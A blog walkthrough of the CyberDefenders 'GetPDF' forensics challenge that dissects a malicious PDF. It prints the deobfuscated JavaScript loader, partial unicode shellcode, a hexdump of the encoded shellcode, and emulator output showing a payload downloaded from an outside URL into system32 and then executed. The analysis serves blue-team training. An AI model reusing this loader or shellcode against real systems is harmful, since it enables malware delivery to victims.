CyberDefenders - GetPDF CTF
Intro
CyberDefenders.org, hosted a challenging reverse engineering challenge. A malicious PDF with some evil Javascript and unicode payloads, it was an interesting challenge…
For those that don’t know about CyberDefenders they host a platform deticated to training BlueTeam skills: Incident response, digital forensics, security analysts, etc). If you are used to VulnHub and Hack-the-box, these services are typically geared more towards redteaming and penetration testing. This is where CyberDefenders stand out!
Walkthrough
1) How many URL path(s) are involved in this incident?
Answer:
6
However, i counted 5 unique URLs (folders and files)
2) What is the URL which contains the JS code?
Answer:
http://blog.honeynet.org.my/forensic_challenge/
3) What is the URL hidden in the JS code?
Answer:
http://blog.honeynet.org.my/forensic_challenge/getpdf.php
4) What is the MD5 hash of the PDF file contained in the packet?
Hint:
- Wireshark ->Export Objects -> HTTP
Answer:
659cf4c6baa87b082227540047538c2a
5) How many object(s) are contained inside the PDF file?
python pdf-parser.py ../fcexploit.pdf -a
Comment: 10
XREF: 1
Trailer: 1
StartXref: 1
Indirect object: 18
7: 5, 7, 9, 10, 22, 23, 28
/Action 1: 4
/Annot 3: 6, 8, 24
/Catalog 2: 1, 27
/EmbeddedFile 1: 11
/Page 2: 3, 25
/Pages 2: 2, 26
Search keywords:
/JS 1: 4
/JavaScript 1: 4
/OpenAction 1: 1
/AcroForm 1: 27
/EmbeddedFile 1: 11
/XFA 1: 28
Answer:
19
6) How many filtering schemes are used for the object streams?
strings ../fcexploit.pdf|grep -i filter
/Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
/Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
/Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
/Filter [ /FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode ]
Answer:
4
7) What is the number of the ‘object stream’ that might contain malicious JS code?
obj 4 0
Type: /Action
Referencing: 5 0 R
<<
/Type /Action
/S /JavaScript
/JS 5 0 R
>>
<< /Type /Action /S /JavaScript /JS 5 0 R >>
Answer:
5
8) Analyzing the PDF file. What ‘object-streams’ contain the JS code responsible for executing the shellcodes? The JS code is divided into two streams. Format: two numbers separated with ‘,’. Put the numbers in ascending order
Answer:
7,9
9) The JS code responsible for executing the exploit contains shellcodes that drop malicious executable files. What is the full path of malicious executable files after being dropped by the malware on the victim machine?
Object 5 decoded:
var SSS=null;var SS="ev";var $S="";$5="in";
app.doc.syncAnnotScan();S$="ti";if(app.plugIns.length!=0){
var $$=0;S$+="tl";$5+="fo";____SSS=app.doc.getAnnots({nPage:0});S$+="e";$S=this.info.title;}
var S5="";if(app.plugIns.length>3){
SS+="a";var arr=$S.split(/U_155bf62c9aU_7917ab39/);
for(var $=1;$<arr.length;$++){
S5+=String.fromCharCode("0x"+arr[$]);
}SS+="l";
}
if(app.plugIns.length>=2){app[SS](S5);}
Use spidermonkey to decode the payload, and urldecode to see some more code…
payload = unescape("%uabba%ua906%u29f1%ud...");
...
function cN() {
var o = "o";
// freecell.exe payload
var payload = unescape("%uc929%u65b1%ud7db%u74d9...");
...
var shellcode = unescape("%uc931%u64b1%ub6bf%u558b%ud976%ud9cd%u2474%u58f4%ue883%u31fc%u0d78%u7803%ue20d%u6043%u2c45%u44e1%ub6af%u964c%ub72e%ued9a%u55a9%u1a18%u71cc%u2237%u7e30%u91b7%u1856%ue9ae%u2394%u7479%ucdff%u5e6b%ufc95%ue562%u12a2%u77ad%u53d8%u925f%u4178%ue5b2%ufc62%uf826%ub883%u9e2c%u6c59%uf5dd%u5d2a%uc113%uc7c1%ub031...");
...
var vvpethya = unescape("%ud3b8%u7458%ud901%u2bcb%ud9c9%u2474%ub1f4%u5a65%u4231%u0312%u1242%u3983%u96a4%u56f4%u0d45%u9bbd%ud7af%ue7f8%u982e%u1dcf%u7aa8%ucad5%u92cf%uf3c1%u9d2f%u4766%ufb49%u941e%uc494%u8389%uacfe%u6ad8%udd95%u0935%uf3a2%u801c%ub2d9%u488c%u2678%u0b5c%udd62%u01f4%u5b82%u4792%u4b5e%u2d2e%ubc2a%uf9ff%ue4c1%u9b9a%u83f7%ucc69%u3938%u1fb1%u7e29%uc50b%ue214%u8248%udcd8%ub3b7%u890b%ue425%uab91%u5210%u5192%uc8fc%u9932%u9def%ubaa1%u0795%u1c9f%uacee%uc5ba%u4b1c%uaf20%u0832%u3e47%u9129%uacf0%ude04%u1062%ue9e7%u0804%uf391%ubf69%ucc69%u71f0%u1108%uccee%u0d20%ubecf%ub462%ud949%u9971%u15e3%u3c5a%ub053%u5d89%u6c82%u6648%u07ae%u7ad2%u148a%ub09d%u1572%u1aab%u33e6%u5a91%ub8af%u4744%udd4a%u8b98%u47f2%u2af0%ub1cc...");
Reverse the unicode shellcode:
00000000: b8d3 5874 01d9 cb2b c9d9 7424 f4b1 655a ..Xt...+..t$..eZ
00000010: 3142 1203 4212 8339 a496 f456 450d bd9b 1B..B..9...VE...
00000020: afd7 f8e7 2e98 cf1d a87a d5ca cf92 c1f3 .........z......
00000030: 2f9d 6647 49fb 1e94 94c4 8983 feac d86a /.fGI..........j
00000040: 95dd 3509 a2f3 1c80 d9b2 8c48 7826 5c0b ..5........Hx&\.
00000050: 62dd f401 825b 9247 5e4b 2e2d 2abc fff9 b....[.G^K.-*...
00000060: c1e4 9a9b f783 69cc 3839 b11f 297e 0bc5 ......i.89..)~..
00000070: 14e2 4882 d8dc b7b3 0b89 25e4 91ab 1052 ..H.......%....R
00000080: 9251 fcc8 3299 ef9d a1ba 9507 9f1c eeac .Q..2...........
00000090: bac5 1c4b 20af 3208 473e 2991 f0ac 04de ...K .2.G>).....
000000a0: 6210 e7e9 0408 91f3 69bf 69cc f071 0811 b.......i.i..q..
000000b0: eecc 200d cfbe 62b4 49d9 7199 e315 5a3c .. ...b.I.q...Z<
000000c0: 53b0 895d 826c 4866 ae07 d27a 8a14 9db0 S..].lHf...z....
000000d0: 7215 ab1a e633 915a afb8 4447 4add 988b r....3.Z..DGJ...
000000e0: f247 f02a ccb1 cf03 0727 1efe 8aed 57ca .G.*.....'....W.
000000f0: cd23 0e03 7772 bc39 21bf 2364 3edf 935d .#..wr.9!.#d>..]
00000100: 71ea 422a 4d2b b8d7 2606 e47d b8e9 71e7 q.B*M+..&..}..q.
00000110: 5cc8 820a 691f 8c2e b21d 8c25 bf34 8520 \...i......%.4.
00000120: 9e35 b798 ff2c a5e0 f46c c6f3 0974 caf5 .5...,...l...t..
00000130: 1969 cd60 139a 194e 4da7 1cf7 52b9 11ea .i.`...NM...R...
00000140: a6cb 3908 c0d1 2725 c7d2 a510 d8d8 bd62 ..9...'%.......b
00000150: f2ff 9a0b e9eb eedf 041c 89d3 2236 771d ............"6w.
00000160: 5a4e 7d17 5b4c b321 435f b931 a439 2abd ZN}.[L.!C_.1.9*.
00000170: 214a 9112 e5c8 8903 9e22 3ab4 0e5e c324 !J.......":..^.$
00000180: aad4 1dd7 4672 4c4a de53 f6fb 52c9 9870 ....FrLJ.S..R..p
00000190: fa72 3a15 9415 a8b5 01b8 5720 e529 f9c6 .r:.......W .)..
000001a0: 8ed0 8b73 5f27 421e e722 1a41 ...s_'B..".A
The shellcode is encoded using MSF Shikata_ga_nai, so you need to use a decoder? or use a shellcode emulator to recover the original unobfuscated shellcode
First we tried to run the shellcode through the Mandiant/Fireeye Speakeasy emulator:
But it failed to provide the full download path of the executable.
Next, we back to good ole scdbg; which was able to provide the full download path
scdbg.exe /f download.dat
Loaded 1ac bytes from file download.dat
Initialization Complete..
Max Steps: 2000000
Using base offset: 0x401000
401104 GetProcAddress(GetSystemDirectoryA)
401104 GetProcAddress(WinExec)
401104 GetProcAddress(ExitThread)
401104 GetProcAddress(LoadLibraryA)
4010af LoadLibraryA(urlmon)
401104 GetProcAddress(URLDownloadToFileA)
4010d3 GetSystemDirectoryA( c:\windows\system32\ )
4010ec URLDownloadToFileA(http://blog.honeynet.org.my/forensic_challenge/malware.4.exe, c:\WINDOWS\system32\a.exe)
4010f3 WinExec(c:\WINDOWS\system32\a.exe)
4010f7 ExitThread(32)
Answer:
c:\Windows\System32\a.exe
10) The PDF file contains another exploit related to CVE-2010-0188. What is the URL of the malicious executable that the shellcode associated with this exploit drop?
Hint:
- PCAP URLs
Answer:
http://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe
11) How many CVEs are included in the PDF file?
Refer to the various shellcodes from question 9:
- Payload #1 - CVE-2009-4324
- Payload #2 - CVE-2008-2992
- Payload #3 - CVE-2007-5659
- Payload #4 - CVE-2009-0927
Payload #5 is the only one that will be executed when first opening the PDF. The other four payloads will work individually, but none will be fired from the PDF file, due to the lack of action trigger and broken JavaScript.
- Payload #5 - (CVE-2010-0188, TIFF): http://blog.honeynet.org.my/forensic_challenge/the_real_malware.exe
This last one is also detected by VirusTotal!
Answer:
5
Tools
Share on: